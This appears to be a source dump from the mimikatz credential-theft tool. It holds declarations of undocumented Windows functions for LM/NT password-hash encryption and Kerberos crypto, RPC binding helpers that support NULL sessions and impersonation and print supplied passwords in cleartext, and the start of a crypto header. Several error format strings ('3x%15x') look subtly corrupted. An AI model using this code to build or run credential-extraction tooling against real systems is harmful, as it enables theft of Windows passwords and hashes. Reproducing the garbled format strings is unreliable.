88 | #define RtlDecryptNtOwfPwdWithUserKey SystemFunction023
89 | #define RtlEncryptLmOwfPwdWithIndex SystemFunction024
90 | #define RtlDecryptLmOwfPwdWithIndex SystemFunction025
91 | #define RtlEncryptNtOwfPwdWithIndex SystemFunction026
92 | #define RtlDecryptNtOwfPwdWithIndex SystemFunction027
93 | #define RtlGetUserSessionKeyClient SystemFunction028
94 | #define RtlGetUserSessionKeyServer SystemFunction029
95 | #define RtlEqualLmOwfPassword SystemFunction030
96 | #define RtlEqualNtOwfPassword SystemFunction031
97 | #define RtlEncryptData2 SystemFunction032 // RC4
98 | #define RtlDecryptData2 SystemFunction033 // RC4
99 | #define RtlGetUserSessionKeyClientBinding SystemFunction034
100 | #define RtlCheckSignatureInFile SystemFunction035
101 |
102 | NTSTATUS WINAPI RtlEncryptBlock(IN LPCBYTE ClearBlock, IN LPCBYTE BlockKey, OUT LPBYTE CypherBlock);
103 | NTSTATUS WINAPI RtlDecryptBlock(IN LPCBYTE CypherBlock, IN LPCBYTE BlockKey, OUT LPBYTE ClearBlock);
104 | NTSTATUS WINAPI RtlEncryptStdBlock(IN LPCBYTE BlockKey, OUT LPBYTE CypherBlock);
105 | NTSTATUS WINAPI RtlEncryptData(IN PCLEAR_DATA ClearData, IN PDATA_KEY DataKey, OUT PCYPHER_DATA CypherData);
106 | NTSTATUS WINAPI RtlDecryptData(IN PCYPHER_DATA CypherData, IN PDATA_KEY DataKey, OUT PCLEAR_DATA ClearData);
107 | NTSTATUS WINAPI RtlCalculateLmOwfPassword(IN LPCSTR data, OUT LPBYTE output);
108 | NTSTATUS WINAPI RtlCalculateNtOwfPassword(IN PCUNICODE_STRING data, OUT LPBYTE output);
109 | NTSTATUS WINAPI RtlCalculateLmResponse(IN LPCBYTE LmChallenge, IN LPCBYTE LmOwfPassword, OUT LPBYTE LmResponse);
110 | NTSTATUS WINAPI RtlCalculateNtResponse(IN LPCBYTE NtChallenge, IN LPCBYTE NtOwfPassword, OUT LPBYTE NtResponse);
111 | NTSTATUS WINAPI RtlCalculateUserSessionKeyLm(IN LPCBYTE LmResponse, IN LPCBYTE LmOwfPassword, OUT LPBYTE UserSessionKey);
112 | NTSTATUS WINAPI RtlCalculateUserSessionKeyNt(IN LPCBYTE NtResponse, IN LPCBYTE NtOwfPassword, OUT LPBYTE UserSessionKey);
113 | NTSTATUS WINAPI RtlEncryptLmOwfPwdWithLmOwfPwd(IN LPCBYTE DataLmOwfPassword, IN LPCBYTE KeyLmOwfPassword, OUT LPBYTE EncryptedLmOwfPassword);
114 | NTSTATUS WINAPI RtlDecryptLmOwfPwdWithLmOwfPwd(IN LPCBYTE EncryptedLmOwfPassword, IN LPCBYTE KeyLmOwfPassword, OUT LPBYTE DataLmOwfPassword);
115 | NTSTATUS WINAPI RtlEncryptNtOwfPwdWithNtOwfPwd(IN LPCBYTE DataNtOwfPassword, IN LPCBYTE KeyNtOwfPassword, OUT LPBYTE EncryptedNtOwfPassword);
116 | NTSTATUS WINAPI RtlDecryptNtOwfPwdWithNtOwfPwd(IN LPCBYTE EncryptedNtOwfPassword, IN LPCBYTE KeyNtOwfPassword, OUT LPBYTE DataNtOwfPassword);
117 | NTSTATUS WINAPI RtlEncryptLmOwfPwdWithLmSesKey(IN LPCBYTE LmOwfPassword, IN LPCBYTE LmSessionKey, OUT LPBYTE EncryptedLmOwfPassword);
118 | NTSTATUS WINAPI RtlDecryptLmOwfPwdWithLmSesKey(IN LPCBYTE EncryptedLmOwfPassword, IN LPCBYTE LmSessionKey, OUT LPBYTE LmOwfPassword);
119 | NTSTATUS WINAPI RtlEncryptNtOwfPwdWithNtSesKey(IN LPCBYTE NtOwfPassword, IN LPCBYTE NtSessionKey, OUT LPBYTE EncryptedNtOwfPassword);
120 | NTSTATUS WINAPI RtlDecryptNtOwfPwdWithNtSesKey(IN LPCBYTE EncryptedNtOwfPassword, IN LPCBYTE NtSessionKey, OUT LPBYTE NtOwfPassword);
121 | NTSTATUS WINAPI RtlEncryptLmOwfPwdWithUserKey(IN LPCBYTE LmOwfPassword, IN LPCBYTE UserSessionKey, OUT LPBYTE EncryptedLmOwfPassword);
122 | NTSTATUS WINAPI RtlDecryptLmOwfPwdWithUserKey(IN LPCBYTE EncryptedLmOwfPassword, IN LPCBYTE UserSessionKey, OUT LPBYTE LmOwfPassword);
123 | NTSTATUS WINAPI RtlEncryptNtOwfPwdWithUserKey(IN LPCBYTE NtOwfPassword, IN LPCBYTE UserSessionKey, OUT LPBYTE EncryptedNtOwfPassword);
124 | NTSTATUS WINAPI RtlDecryptNtOwfPwdWithUserKey(IN LPCBYTE EncryptedNtOwfPassword, IN LPCBYTE UserSessionKey, OUT LPBYTE NtOwfPassword);
125 | NTSTATUS WINAPI RtlEncryptLmOwfPwdWithIndex(IN LPCBYTE LmOwfPassword, IN LPDWORD Index, OUT LPBYTE EncryptedLmOwfPassword);
126 | NTSTATUS WINAPI RtlDecryptLmOwfPwdWithIndex(IN LPCBYTE EncryptedLmOwfPassword, IN LPDWORD Index, OUT LPBYTE LmOwfPassword);
127 | NTSTATUS WINAPI RtlEncryptNtOwfPwdWithIndex(IN LPCBYTE NtOwfPassword, IN LPDWORD Index, OUT LPBYTE EncryptedNtOwfPassword);
128 | NTSTATUS WINAPI RtlDecryptNtOwfPwdWithIndex(IN LPCBYTE EncryptedNtOwfPassword, IN LPDWORD Index, OUT LPBYTE NtOwfPassword);
129 | NTSTATUS WINAPI RtlGetUserSessionKeyClient(IN PVOID RpcContextHandle, OUT LPBYTE UserSessionKey);
130 | NTSTATUS WINAPI RtlGetUserSessionKeyServer(IN PVOID RpcContextHandle OPTIONAL, OUT LPBYTE UserSessionKey);
131 | BOOLEAN WINAPI RtlEqualLmOwfPassword(IN LPCBYTE LmOwfPassword1, IN LPCBYTE LmOwfPassword2);
132 | BOOLEAN WINAPI RtlEqualNtOwfPassword(IN LPCBYTE NtOwfPassword1, IN LPCBYTE NtOwfPassword2);
133 | NTSTATUS WINAPI RtlEncryptData2(IN OUT PCRYPT_BUFFER pData, IN PDATA_KEY pkey);
134 | NTSTATUS WINAPI RtlDecryptData2(IN OUT PCRYPT_BUFFER pData, IN PDATA_KEY pkey);
135 | NTSTATUS WINAPI RtlGetUserSessionKeyClientBinding(IN PVOID RpcBindingHandle, OUT HANDLE *RedirHandle, OUT LPBYTE UserSessionKey);
136 | ULONG WINAPI RtlCheckSignatureInFile(IN LPCWSTR filename);
137 |
138 | #if !defined(RtlGenRandom)
139 | #define RtlGenRandom SystemFunction036
140 | BOOL WINAPI RtlGenRandom(OUT LPBYTE output, IN DWORD length);
141 | #endif
142 |
143 | #if !defined(RtlEncryptMemory)
144 | #define RtlEncryptMemory SystemFunction040
145 | NTSTATUS WINAPI RtlEncryptMemory(IN OUT LPBYTE data, DWORD length, DWORD flags);
146 | #endif
147 |
148 | #if !defined(RtlDecryptMemory)
149 | #define RtlDecryptMemory SystemFunction041
150 | NTSTATUS WINAPI RtlDecryptMemory(IN OUT LPBYTE data, DWORD length, DWORD flags);
151 | #endif
152 |
153 | #define KERB_NON_KERB_SALT 16
154 | #define KERB_NON_KERB_CKSUM_SALT 17
155 |
156 | typedef NTSTATUS (WINAPI * PKERB_CHECKSUM_INITIALIZE) (ULONG dwSeed, PVOID *pContext);
157 | typedef NTSTATUS (WINAPI * PKERB_CHECKSUM_SUM) (PVOID pContext, ULONG cbData, LPCVOID pbData);
158 | typedef NTSTATUS (WINAPI * PKERB_CHECKSUM_FINALIZE) (PVOID pContext, PVOID pbSum);
159 | typedef NTSTATUS (WINAPI * PKERB_CHECKSUM_FINISH) (PVOID *pContext);
160 | typedef NTSTATUS (WINAPI * PKERB_CHECKSUM_INITIALIZEEX) (LPCVOID Key, ULONG KeySize, ULONG MessageType, PVOID *pContext);
161 | typedef NTSTATUS (WINAPI * PKERB_CHECKSUM_INITIALIZEEX2)(LPCVOID Key, ULONG KeySize, LPCVOID ChecksumToVerify, ULONG MessageType, PVOID *pContext);
162 |
163 | typedef struct _KERB_CHECKSUM {
164 | ULONG CheckSumType;
165 | ULONG CheckSumSize;
166 | ULONG Attributes;
167 | PKERB_CHECKSUM_INITIALIZE Initialize;
168 | PKERB_CHECKSUM_SUM Sum;
169 | PKERB_CHECKSUM_FINALIZE Finalize;
170 | PKERB_CHECKSUM_FINISH Finish;
171 | PKERB_CHECKSUM_INITIALIZEEX InitializeEx;
172 | PKERB_CHECKSUM_INITIALIZEEX2 InitializeEx2;
173 | } KERB_CHECKSUM, *PKERB_CHECKSUM;
174 |
175 | typedef NTSTATUS (WINAPI * PKERB_ECRYPT_INITIALIZE) (LPCVOID pbKey, ULONG KeySize, ULONG MessageType, PVOID *pContext);
176 | typedef NTSTATUS (WINAPI * PKERB_ECRYPT_ENCRYPT) (PVOID pContext, LPCVOID pbInput, ULONG cbInput, PVOID pbOutput, ULONG *cbOutput);
177 | typedef NTSTATUS (WINAPI * PKERB_ECRYPT_DECRYPT) (PVOID pContext, LPCVOID pbInput, ULONG cbInput, PVOID pbOutput, ULONG *cbOutput);
178 | typedef NTSTATUS (WINAPI * PKERB_ECRYPT_FINISH) (PVOID *pContext);
179 | typedef NTSTATUS (WINAPI * PKERB_ECRYPT_HASHPASSWORD_NT5) (PCUNICODE_STRING Password, PVOID pbKey);
180 | typedef NTSTATUS (WINAPI * PKERB_ECRYPT_HASHPASSWORD_NT6) (PCUNICODE_STRING Password, PCUNICODE_STRING Salt, ULONG Count, PVOID pbKey);
181 | typedef NTSTATUS (WINAPI * PKERB_ECRYPT_RANDOMKEY) (LPCVOID Seed, ULONG SeedLength, PVOID pbKey);
182 | typedef NTSTATUS (WINAPI * PKERB_ECRYPT_CONTROL) (ULONG Function, PVOID pContext, PUCHAR InputBuffer, ULONG InputBufferSize);
183 |
184 | typedef struct _KERB_ECRYPT {
185 | ULONG EncryptionType;
186 | ULONG BlockSize;
187 | ULONG ExportableEncryptionType;
188 | ULONG KeySize;
189 | ULONG HeaderSize;
190 | ULONG PreferredCheckSum;
191 | ULONG Attributes;
192 | PCWSTR Name;
193 | PKERB_ECRYPT_INITIALIZE Initialize;
194 | PKERB_ECRYPT_ENCRYPT Encrypt;
195 | PKERB_ECRYPT_DECRYPT Decrypt;
196 | PKERB_ECRYPT_FINISH Finish;
197 | union {
198 | PKERB_ECRYPT_HASHPASSWORD_NT5 HashPassword_NT5;
199 | PKERB_ECRYPT_HASHPASSWORD_NT6 HashPassword_NT6;
200 | };
201 | PKERB_ECRYPT_RANDOMKEY RandomKey;
202 | PKERB_ECRYPT_CONTROL Control;
203 | PVOID unk0_null;
204 | PVOID unk1_null;
205 | PVOID unk2_null;
206 | } KERB_ECRYPT, *PKERB_ECRYPT;
207 |
208 | typedef NTSTATUS (WINAPI * PKERB_RNGFN) (PVOID pbBuffer, ULONG cbBuffer);
209 |
210 | typedef struct _KERB_RNG {
211 | ULONG GeneratorId;
212 | ULONG Attributes;
213 | ULONG Seed;
214 | PKERB_RNGFN RngFn;
215 | } KERB_RNG, *PKERB_RNG;
216 |
217 | NTSTATUS WINAPI CDLocateCSystem(ULONG Type, PKERB_ECRYPT *ppCSystem);
218 | NTSTATUS WINAPI CDLocateCheckSum(ULONG Type, PKERB_CHECKSUM *ppCheckSum);
219 | NTSTATUS WINAPI CDLocateRng(ULONG Id, PKERB_RNG *ppRng);
220 | NTSTATUS WINAPI CDGenerateRandomBits(LPVOID pbBuffer, ULONG cbBuffer);
--------------------------------------------------------------------------------
/modules/rpc/kull_m_rpc.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kull_m_rpc.h"
7 |
8 | LPCWSTR KULL_M_RPC_AUTHNLEV[7] = {L"DEFAULT", L"NONCE", L"CONNECT", L"CALL", L"PKT", L"PKT_INTEGRITY", L"PKT_PRIVACY",};
9 | LPCWSTR KULL_M_RPC_AUTHNSVC(DWORD AuthnSvc)
10 | {
11 | LPCWSTR szAuthnSvc;
12 | switch(AuthnSvc)
13 | {
14 | case RPC_C_AUTHN_NONE:
15 | szAuthnSvc = L"NONE";
16 | break;
17 | case RPC_C_AUTHN_GSS_NEGOTIATE:
18 | szAuthnSvc = L"GSS_NEGOTIATE";
19 | break;
20 | case RPC_C_AUTHN_WINNT:
21 | szAuthnSvc = L"WINNT";
22 | break;
23 | case RPC_C_AUTHN_GSS_KERBEROS:
24 | szAuthnSvc = L"GSS_KERBEROS";
25 | break;
26 | case RPC_C_AUTHN_DEFAULT:
27 | szAuthnSvc = L"DEFAULT";
28 | break;
29 | default:
30 | szAuthnSvc = L"?";
31 | }
32 | return szAuthnSvc;
33 | }
34 | const SEC_WINNT_AUTH_IDENTITY KULL_M_RPC_NULLSESSION = {(unsigned short __RPC_FAR *) L"", 0, (unsigned short __RPC_FAR *) L"", 0, (unsigned short __RPC_FAR *) L"", 0, SEC_WINNT_AUTH_IDENTITY_UNICODE};
35 |
36 | BOOL kull_m_rpc_createBinding(LPCWSTR uuid, LPCWSTR ProtSeq, LPCWSTR NetworkAddr, LPCWSTR Endpoint, LPCWSTR Service, BOOL addServiceToNetworkAddr, DWORD AuthnSvc, RPC_AUTH_IDENTITY_HANDLE hAuth, DWORD ImpersonationType, RPC_BINDING_HANDLE *hBinding, void (RPC_ENTRY * RpcSecurityCallback)(void *))
37 | {
38 | BOOL status = FALSE;
39 | RPC_STATUS rpcStatus;
40 | RPC_WSTR StringBinding = NULL;
41 | RPC_SECURITY_QOS SecurityQOS = {RPC_C_SECURITY_QOS_VERSION, RPC_C_QOS_CAPABILITIES_MUTUAL_AUTH | (ImpersonationType == RPC_C_IMP_LEVEL_DELEGATE) ? RPC_C_QOS_CAPABILITIES_IGNORE_DELEGATE_FAILURE : 0, RPC_C_QOS_IDENTITY_STATIC, ImpersonationType};
42 | LPWSTR fullServer = NULL;
43 |
44 | *hBinding = NULL;
45 | rpcStatus = RpcStringBindingCompose((RPC_WSTR) uuid, (RPC_WSTR) ProtSeq, (RPC_WSTR) NetworkAddr, (RPC_WSTR) Endpoint, NULL, &StringBinding);
46 | if(rpcStatus == RPC_S_OK)
47 | {
48 | rpcStatus = RpcBindingFromStringBinding(StringBinding, hBinding);
49 | if(rpcStatus == RPC_S_OK)
50 | {
51 | if(*hBinding)
52 | {
53 | if(AuthnSvc != RPC_C_AUTHN_NONE)
54 | {
55 | if(addServiceToNetworkAddr)
56 | {
57 | if(Service && NetworkAddr)
58 | {
59 | kull_m_string_sprintf(&fullServer, L"%s/%s", Service, NetworkAddr);
60 | }
61 | else PRINT_ERROR(L"Cannot add Service to NetworkAddr if NULL\n");
62 | }
63 |
64 | if(!addServiceToNetworkAddr || fullServer)
65 | {
66 | rpcStatus = RpcBindingSetAuthInfoEx(*hBinding, (RPC_WSTR) (fullServer ? fullServer : (Service ? Service : MIMIKATZ)), RPC_C_AUTHN_LEVEL_PKT_PRIVACY, AuthnSvc, hAuth, RPC_C_AUTHZ_NONE, &SecurityQOS);
67 | if(rpcStatus == RPC_S_OK)
68 | {
69 | if(RpcSecurityCallback)
70 | {
71 | rpcStatus = RpcBindingSetOption(*hBinding, RPC_C_OPT_SECURITY_CALLBACK, (ULONG_PTR) RpcSecurityCallback);
72 | status = (rpcStatus == RPC_S_OK);
73 | if(!status)
74 | PRINT_ERROR(L"RpcBindingSetOption: 3x%15x (%u)\n", rpcStatus, rpcStatus);
75 | }
76 | else status = TRUE;
77 | }
78 | else PRINT_ERROR(L"RpcBindingSetAuthInfoEx: 3x%15x (%u)\n", rpcStatus, rpcStatus);
79 | }
80 | }
81 | else status = TRUE;
82 |
83 | if(!status)
84 | {
85 | rpcStatus = RpcBindingFree(hBinding);
86 | if(rpcStatus == RPC_S_OK)
87 | *hBinding = NULL;
88 | else PRINT_ERROR(L"RpcBindingFree: 3x%15x (%u)\n", rpcStatus, rpcStatus);
89 | }
90 | }
91 | else PRINT_ERROR(L"No Binding!\n");
92 | }
93 | else PRINT_ERROR(L"RpcBindingFromStringBinding: 3x%15x (%u)\n", rpcStatus, rpcStatus);
94 | RpcStringFree(&StringBinding);
95 | }
96 | else PRINT_ERROR(L"RpcStringBindingCompose: 3x%15x (%u)\n", rpcStatus, rpcStatus);
97 |
98 | if(fullServer)
99 | {
100 | LocalFree(fullServer);
101 | }
102 |
103 | return status;
104 | }
105 |
106 | BOOL kull_m_rpc_deleteBinding(RPC_BINDING_HANDLE *hBinding)
107 | {
108 | BOOL status = FALSE;
109 | if(status = (RpcBindingFree(hBinding) == RPC_S_OK))
110 | *hBinding = NULL;
111 | return status;
112 | }
113 |
114 | RPC_STATUS CALLBACK kull_m_rpc_nice_SecurityCallback(RPC_IF_HANDLE hInterface, void *pBindingHandle)
115 | {
116 | return RPC_S_OK;
117 | }
118 |
119 | RPC_STATUS CALLBACK kull_m_rpc_nice_verb_SecurityCallback(RPC_IF_HANDLE hInterface, void *pBindingHandle)
120 | {
121 | RPC_STATUS status;
122 | RPC_AUTHZ_HANDLE hAuthz;
123 | RPC_WSTR ServerPrincName;
124 | DWORD AuthnLevel, AuthnSvc, AuthzSvc;
125 | LPCWSTR szAuthnLevel, szAuthnSvc;
126 |
127 | kprintf(L"** Security Callback! **\n");
128 | status = RpcBindingInqAuthClient(pBindingHandle, &hAuthz, &ServerPrincName, &AuthnLevel, &AuthnSvc, &AuthzSvc);
129 | if(status == RPC_S_OK)
130 | {
131 | szAuthnLevel = (AuthnLevel < ARRAYSIZE(KULL_M_RPC_AUTHNLEV)) ? KULL_M_RPC_AUTHNLEV[AuthnLevel] : L"?";
132 | szAuthnSvc = KULL_M_RPC_AUTHNSVC(AuthnSvc);
133 | kprintf(L" > ServerPrincName: %s\n"
134 | L" > AuthnLevel : %2u - %s\n"
135 | L" > AuthnSvc : %2u - %s\n"
136 | L" > AuthzSvc : %2u\n", ServerPrincName, AuthnLevel, szAuthnLevel, AuthnSvc, szAuthnSvc, AuthzSvc);
137 | RpcStringFree(&ServerPrincName);
138 | RpcImpersonateClient(pBindingHandle);
139 | RpcRevertToSelf();
140 | }
141 | else if(status == RPC_S_BINDING_HAS_NO_AUTH)
142 | kprintf(L" > No Authentication\n");
143 | else PRINT_ERROR(L"RpcBindingInqAuthClient: %08x\n", status);
144 | return RPC_S_OK;
145 | }
146 |
147 | void kull_m_rpc_getArgs(int argc, wchar_t * argv[], LPCWSTR *szRemote, LPCWSTR *szProtSeq, LPCWSTR *szEndpoint, LPCWSTR *szService, LPCWSTR szDefaultService, DWORD *AuthnSvc, DWORD defAuthnSvc, BOOL *isNullSession, SEC_WINNT_AUTH_IDENTITY *pAuthIdentity, GUID *altGuid, BOOL printIt)
148 | {
149 | PCWSTR data;
150 | UNICODE_STRING us;
151 |
152 | if(szRemote)
153 | {
154 | if(!kull_m_string_args_byName(argc, argv, L"remote", szRemote, NULL))
155 | if(!kull_m_string_args_byName(argc, argv, L"server", szRemote, NULL))
156 | kull_m_string_args_byName(argc, argv, L"target", szRemote, NULL);
157 | if(printIt)
158 | kprintf(L"[rpc] Remote : %s\n", *szRemote);
159 | }
160 |
161 | if(szProtSeq)
162 | {
163 | kull_m_string_args_byName(argc, argv, L"protseq", szProtSeq, L"ncacn_ip_tcp");
164 | if(printIt)
165 | kprintf(L"[rpc] ProtSeq : %s\n", *szProtSeq);
166 | }
167 |
168 | if(szEndpoint)
169 | {
170 | kull_m_string_args_byName(argc, argv, L"endpoint", szEndpoint, NULL);
171 | if(printIt)
172 | kprintf(L"[rpc] Endpoint : %s\n", *szEndpoint);
173 | }
174 |
175 | if(szService)
176 | {
177 | if(!kull_m_string_args_byName(argc, argv, L"service", szService, NULL))
178 | kull_m_string_args_byName(argc, argv, L"altservice", szService, szDefaultService);
179 | if(printIt)
180 | kprintf(L"[rpc] Service : %s\n", *szService);
181 | }
182 |
183 | if(AuthnSvc)
184 | {
185 | if(kull_m_string_args_byName(argc, argv, L"noauth", NULL, NULL))
186 | *AuthnSvc = RPC_C_AUTHN_NONE;
187 | else if(kull_m_string_args_byName(argc, argv, L"ntlm", NULL, NULL))
188 | *AuthnSvc = RPC_C_AUTHN_WINNT;
189 | else if(kull_m_string_args_byName(argc, argv, L"kerberos", NULL, NULL))
190 | *AuthnSvc = RPC_C_AUTHN_GSS_KERBEROS;
191 | else if(kull_m_string_args_byName(argc, argv, L"negotiate", NULL, NULL))
192 | *AuthnSvc = RPC_C_AUTHN_GSS_NEGOTIATE;
193 | else *AuthnSvc = defAuthnSvc;
194 | if(printIt)
195 | kprintf(L"[rpc] AuthnSvc : %s (%u)\n", KULL_M_RPC_AUTHNSVC(*AuthnSvc), *AuthnSvc);
196 | }
197 |
198 | if(isNullSession)
199 | {
200 | *isNullSession = kull_m_string_args_byName(argc, argv, L"null", NULL, NULL);
201 | if(printIt)
202 | kprintf(L"[rpc] NULL Sess: %s\n", (*isNullSession) ? L"yes" : L"no");
203 | }
204 |
205 | if(pAuthIdentity && (!isNullSession || !*isNullSession))
206 | {
207 | pAuthIdentity->Flags = SEC_WINNT_AUTH_IDENTITY_UNICODE;
208 |
209 | kull_m_string_args_byName(argc, argv, L"authuser", (const wchar_t **) &pAuthIdentity->User, L"");
210 | pAuthIdentity->UserLength = lstrlen((LPCWSTR) pAuthIdentity->User);
211 | kull_m_string_args_byName(argc, argv, L"authdomain", (const wchar_t **) &pAuthIdentity->Domain, L"");
212 | pAuthIdentity->DomainLength = lstrlen((LPCWSTR) pAuthIdentity->Domain);
213 | kull_m_string_args_byName(argc, argv, L"authpassword", (const wchar_t **) &pAuthIdentity->Password, L"");
214 | pAuthIdentity->PasswordLength = lstrlen((LPCWSTR) pAuthIdentity->Password);
215 |
216 | if(pAuthIdentity->UserLength)
217 | {
218 | kprintf(L"[rpc] Username : %s\n[rpc] Domain : %s\n[rpc] Password : %s\n", pAuthIdentity->User, pAuthIdentity->Domain, pAuthIdentity->Password);
219 | }
220 | }
221 |
222 | if(altGuid)
223 | {
224 | if(kull_m_string_args_byName(argc, argv, L"guid", &data, NULL))
225 | {
226 | RtlInitUnicodeString(&us, data);
227 | if(NT_SUCCESS(RtlGUIDFromString(&us, altGuid)) && printIt)
228 | {
229 | kprintf(L"[rpc] Alt GUID : ");
230 | kull_m_string_displayGUID(altGuid);
231 | kprintf(L"\n");
232 | }
233 | }
234 | }
235 | }
236 |
237 | void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes)
238 | {
239 | return LocalAlloc(LPTR, cBytes);
240 | }
241 |
242 | void __RPC_USER midl_user_free(void __RPC_FAR * p)
243 | {
244 | if(p)
245 | LocalFree(p);
246 | }
247 |
248 | void __RPC_USER ReadFcn(void *State, char **pBuffer, unsigned int *pSize)
249 | {
250 | *pBuffer = (char *) ((PKULL_M_RPC_FCNSTRUCT) State)->addr;
251 | ((PKULL_M_RPC_FCNSTRUCT) State)->addr = *pBuffer + *pSize;
252 | ((PKULL_M_RPC_FCNSTRUCT) State)->size -= *pSize;
253 | }
254 |
255 | void __RPC_USER WriteFcn(void *State, char *Buffer, unsigned int Size)
256 | {
257 | }
258 |
259 | void __RPC_USER AllocFcn (void *State, char **pBuffer, unsigned int *pSize)
260 | {
261 | }
262 |
263 | BOOL kull_m_rpc_Generic_Decode(PVOID data, DWORD size, PVOID pObject, PGENERIC_RPC_DECODE fDecode)
264 | {
265 | BOOL status = FALSE;
266 | RPC_STATUS rpcStatus;
267 | PVOID buffer;
268 | KULL_M_RPC_FCNSTRUCT UserState ;
269 | handle_t pHandle;
270 |
271 | if(buffer = UserState.addr = LocalAlloc(LPTR, size))
272 | {
273 | UserState.size = size;
274 | RtlCopyMemory(UserState.addr, data, size); // avoid data alteration
275 | rpcStatus = MesDecodeIncrementalHandleCreate(&UserState, ReadFcn, &pHandle);
276 | if(NT_SUCCESS(rpcStatus))
277 | {
278 | rpcStatus = MesIncrementalHandleReset(pHandle, NULL, NULL, NULL, NULL, MES_DECODE);
279 | if(NT_SUCCESS(rpcStatus))
280 | {
281 | RpcTryExcept
282 | {
283 | fDecode(pHandle, pObject);
284 | status = TRUE;
285 | }
286 | RpcExcept(EXCEPTION_EXECUTE_HANDLER)
287 | PRINT_ERROR(L"RPC Exception: 3x%15x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
288 | RpcEndExcept
289 | }
290 | else PRINT_ERROR(L"MesIncrementalHandleReset: %08x\n", rpcStatus);
291 | MesHandleFree(pHandle);
292 | }
293 | else PRINT_ERROR(L"MesDecodeIncrementalHandleCreate: %08x\n", rpcStatus);
294 | LocalFree(buffer);
295 | }
296 | return status;
297 | }
298 |
299 | void kull_m_rpc_Generic_Free(PVOID pObject, PGENERIC_RPC_FREE fFree)
300 | {
301 | RPC_STATUS rpcStatus;
302 | KULL_M_RPC_FCNSTRUCT UserState = {NULL, 0};
303 | handle_t pHandle;
304 |
305 | rpcStatus = MesDecodeIncrementalHandleCreate(&UserState, ReadFcn, &pHandle); // for legacy
306 | if(NT_SUCCESS(rpcStatus))
307 | {
308 | RpcTryExcept
309 | fFree(pHandle, pObject);
310 | RpcExcept(EXCEPTION_EXECUTE_HANDLER)
311 | PRINT_ERROR(L"RPC Exception: 3x%15x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
312 | RpcEndExcept
313 | MesHandleFree(pHandle);
314 | }
315 | else PRINT_ERROR(L"MesDecodeIncrementalHandleCreate: %08x\n", rpcStatus);
316 | }
317 |
318 | BOOL kull_m_rpc_Generic_Encode(PVOID pObject, PVOID *data, DWORD *size, PGENERIC_RPC_ENCODE fEncode, PGENERIC_RPC_ALIGNSIZE fAlignSize)
319 | {
320 | BOOL status = FALSE;
321 | RPC_STATUS rpcStatus;
322 | KULL_M_RPC_FCNSTRUCT UserState;
323 | handle_t pHandle;
324 |
325 | rpcStatus = MesEncodeIncrementalHandleCreate(&UserState, ReadFcn, WriteFcn, &pHandle);
326 | if(NT_SUCCESS(rpcStatus))
327 | {
328 | *size = (DWORD) fAlignSize(pHandle, pObject);
329 | if(*data = LocalAlloc(LPTR, *size))
330 | {
331 | rpcStatus = MesIncrementalHandleReset(pHandle, NULL, NULL, NULL, NULL, MES_ENCODE);
332 | if(NT_SUCCESS(rpcStatus))
333 | {
334 | UserState.addr = *data;
335 | UserState.size = *size;
336 | RpcTryExcept
337 | {
338 | fEncode(pHandle, pObject);
339 | status = TRUE;
340 | }
341 | RpcExcept(EXCEPTION_EXECUTE_HANDLER)
342 | PRINT_ERROR(L"RPC Exception: 3x%15x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
343 | RpcEndExcept
344 | }
345 | else PRINT_ERROR(L"MesIncrementalHandleReset: %08x\n", rpcStatus);
346 |
347 | if(!status)
348 | {
349 | *data = LocalFree(*data);
350 | *size = 0;
351 | }
352 | }
353 | MesHandleFree(pHandle);
354 | }
355 | else PRINT_ERROR(L"MesEncodeIncrementalHandleCreate: %08x\n", rpcStatus);
356 | return status;
357 | }
358 |
--------------------------------------------------------------------------------
/modules/kull_m_crypto.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "kull_m_string.h"
9 | #include "kull_m_crypto_system.h"
10 | #include "kull_m_file.h"
11 |
12 | #define CALG_CRC32 (ALG_CLASS_HASH | ALG_TYPE_ANY | 0)
13 |
14 | #define AES_256_KEY_SIZE (256/8)
15 | #define AES_128_KEY_SIZE (128/8)
16 | #define AES_BLOCK_SIZE 16
17 |
18 | typedef struct _GENERICKEY_BLOB {
19 | BLOBHEADER Header;
20 | DWORD dwKeyLen;
21 | } GENERICKEY_BLOB, *PGENERICKEY_BLOB;
22 |
23 | typedef struct _RSA_GENERICKEY_BLOB {
24 | BLOBHEADER Header;
25 | RSAPUBKEY RsaKey; // works with RSA2 ;)
26 | } RSA_GENERICKEY_BLOB, *PRSA_GENERICKEY_BLOB;
27 |
28 | typedef struct _DSS_GENERICKEY_BLOB {
29 | BLOBHEADER Header;
30 | DSSPUBKEY DsaKey; // works with DSS2 ;)
31 | } DSS_GENERICKEY_BLOB, *PDSS_GENERICKEY_BLOB;
32 |
33 | typedef struct _DSS_GENERICKEY3_BLOB {
34 | BLOBHEADER Header;
35 | DSSPRIVKEY_VER3 DsaKey; // works with DSS4 (but not DSS3) ;)
36 | } DSS_GENERICKEY3_BLOB, *PDSS_GENERICKEY3_BLOB;
37 |
38 | #define PVK_FILE_VERSION_0 0
39 | #define PVK_MAGIC 0xb0b5f11e // bob's file
40 | #define PVK_NO_ENCRYPT 0
41 | #define PVK_RC4_PASSWORD_ENCRYPT 1
42 | #define PVK_RC2_CBC_PASSWORD_ENCRYPT 2
43 |
44 | #if !defined(IPSEC_FLAG_CHECK)
45 | #define IPSEC_FLAG_CHECK 0xf42a19b6
46 | #endif
47 |
48 | #if !defined(X509_ECC_PRIVATE_KEY)
49 | #define X509_ECC_PRIVATE_KEY (LPCSTR) 82
50 | #endif
51 |
52 | #if !defined(CNG_RSA_PRIVATE_KEY_BLOB)
53 | #define CNG_RSA_PRIVATE_KEY_BLOB (LPCSTR) 83
54 | #endif
55 |
56 | #if !defined(NCRYPT_PREFER_VIRTUAL_ISOLATION_FLAG)
57 | #define NCRYPT_PREFER_VIRTUAL_ISOLATION_FLAG 0x10000
58 | #endif
59 | #if !defined(NCRYPT_USE_VIRTUAL_ISOLATION_FLAG)
60 | #define NCRYPT_USE_VIRTUAL_ISOLATION_FLAG 0x20000
61 | #endif
